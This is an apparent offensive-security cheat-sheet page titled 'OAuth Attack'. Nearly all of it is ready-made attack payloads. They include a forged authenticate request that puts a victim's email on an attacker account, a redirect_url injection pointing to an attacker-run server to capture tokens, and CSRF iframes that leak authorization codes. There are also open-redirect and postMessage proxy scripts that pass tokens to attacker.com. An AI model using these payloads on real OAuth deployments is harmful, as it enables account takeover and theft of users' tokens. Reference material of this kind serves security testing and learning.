Exploit Notes

OAuth Attack

Last modified: 2022-12-01

Web

Change User Info

POST /authenticate HTTP/1.1
...

{
    "email":"victim@example.com",
    "username":"attacker",
    "token":"b7Gl7Xoy..."
}

Steal Tokens

  1. Open Web Server in Your Local Machine

    python3 -m http.server 8000

  2. Inject Your Local URL to the Redirect URL

    Access to the URL below.

    https://vulnerable.com/oauth?redirect_url=http://<attacker-ip>:8000/login&response_type=token&scope=all

CSRF

  1. Steal Code

    <iframe src="https://vulnerable.com/oauth-linking?code=kZ7bfFa..."></iframe>

  2. Hijack redirect_url

    <iframe src="https://vulnerable.com/auth?client_id=ysdj...&redirect_uri=https://attacker.com&response_type=code&scope=openid%20profile%20email">
</iframe>

  3. Open Redirect

    <script>
    if (!document.location.hash) {
        window.location = 'https://vulnerable.com/auth?client_id=7Fdx8a...&redirect_uri=https://vulnerable.com/oauth-callback/../post/next?path=https://attacker.com/exploit/&response_type=token&nonce=398...&scope=openid%20profile%20email'
    } else {
        window.location = '/?'+document.location.hash.substr(1)
    }
</script>

  4. Proxy Page (postMessage)

    <iframe src="https://vulnerable.com/auth?client_id=iknf...&redirect_uri=https://vulnerable.com/oauth-callback/../post/comment/comment-form&response_type=token&nonce=-118...&scope=openid%20profile%20email"></iframe>
<script>
    window.addEventListener('message', e => {
        fetch("/" + encodeURIComponent(e.data.data));
    }, false);
</script>